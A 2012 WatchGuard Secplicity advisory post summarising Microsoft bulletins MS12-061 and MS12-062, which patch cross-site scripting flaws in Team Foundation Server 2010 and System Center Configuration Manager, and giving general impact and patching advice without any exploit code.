• Articles
    • Editorial Articles
    • Research Articles
    • WatchGuard Articles
  • The 443 Podcast
  • Threat Landscape
  • About
    • About Us
    • Contact Us
    • Contribute to Secplicity

Secplicity - Security Simplified

Powered by WatchGuard Technologies

XSS Vulnerabilities in Microsoft Servers and Developer Tools

September 11, 2012 By Corey Nachreiner

Severity: Medium

Summary:

  • These vulnerabilities affect: Visual Studio Team Foundation Server 2010, Systems Management Server 2003, and System Center Configuration Manager 2007
  • How an attacker exploits it: By enticing a user to click a specially crafted link, or visit a malicious web site
  • Impact: An attacker can elevate his privileges and take any action your users can
  • What to do: Deploy the appropriate update as soon as possible, or let Windows Automatic Update do it for you

Exposure:

Today, Microsoft released two security bulletins describing a pair of cross-site scripting (XSS) vulnerabilities in their Server software and development tools. They rate both updates as Important. The bulletins specifically affect:

  • Visual Studio Team Foundation Server 2010
  • Systems Management Server 2003
  • System Center Configuration Manager 2007

We summarize each bulletin below:

  • MS12-061: Visual Studio Team Foundation XSS Vulnerability

Team Foundation Server is a software development collaborative platform that allows developers to manage multi-person projects. It suffers from a cross-site scripting (XSS) vulnerability, which attackers can potentially leverage to elevation their privilege on your development server.

By enticing one of your users to click a specially crafted link, an attacker could exploit this flaw to  execute script with your user’s privileges. This script could steal the user’s cookies, redirect their browser to malicious sites, or essentially take any action the user could on your Team Foundation Server. If you use this development platform, you should apply Microsoft’s updates as soon as possible.

Microsoft rating: Important.

  • MS12-062: System Center Configuration Manager XSS Vulnerability

System Center Configuration Manager is a PC management platform that allows you to manage many Windows computers at once. You can use it for patch management, software distribution, OS deployment, remote control, and more. It too suffers from a cross-site scripting (XSS) vulnerability, very similar to the one described above. Again, if an attacker can lure you into clicking a specially crafted link, he could exploit this flaw to  execute script with your privileges. This would allow him to do anything in System Center Configuration Manager that you could. If you use this management system in your network, you should apply Microsoft’s patch as soon as possible.

Microsoft rating: Important.

Solution Path:

Microsoft has released updates that correct these vulnerabilities. You should download, test, and deploy the appropriate patches as soon as you can. If you choose, you can also let Windows Update automatically download and install these updates for you, though we recommend you test server patches before deploying them to production environments.

The links below take you directly to the “Affected and Non-Affected Software” section for each bulletin, where you will find links for the various updates:

  • MS12-061
  • MS12-062

As an aside, Internet Explorer 8 and above includes an XSS Filter feature, which prevents these sorts of XSS attacks from working. You may want to enable the XSS Filter feature to benefit from its protections.

For All WatchGuard Users:

If you use a WatchGuard XTM appliance with the Intrusion Prevention Service (IPS), it can help mitigate attacks leveraging either of these flaws. According to our Best-in-Class IPS partner, one of our IPS service’s generic XSS signatures detects and prevents these vulnerabilities. We recommend you turn on our IPS service if you haven’t already.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

  • MS Security Bulletin MS12-061
  • MS Security Bulletin MS12-062

Share This:

Related

Filed Under: Security Bytes Tagged With: Microsoft, Microsoft Servers, Updates and patches, Visual Studio

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

The 443 Podcast

A weekly podcast featuring the leading white-hat hackers and security researchers. Listen Now
the 443 podcast

Threat Landscape

Filter and view Firebox Feed data by type of attack, region, country, and date range. View Now
threat landscape

Top Posts

  • Cybersecurity News: Free Cybersecurity Training, TrickBot Group Exposed, Major GoDaddy Breach, and Russia to Legalize cybercrime?!
  • US National Cybersecurity Strategy
  • 3CX Supply Chain Attack
  • Here Come The Regulations

Email Newsletter

Sign up to get the latest security news and threat analysis delivered straight to your inbox

By signing up you agree to our Privacy Policy.


The views and opinions expressed on this website are those of the authors and do not necessarily reflect the policy or position of WatchGuard Technologies.

Stay in Touch

Recent Posts

  • 3CX Supply Chain Attack
  • The NSA’s Guidance on Securing Authentication
  • Cybersecurity News: LastPass Incident Revealed, White House Issues Cybersecurity Strategy, FBI Purchases Leaked USHOR PII Data, and a Slew of Other Breaches
  • An Update on Section 230
  • Here Come The Regulations
View All

Search

Archives

Copyright © 2023 WatchGuard Technologies · Cookie Policy · Privacy Policy · Terms of Use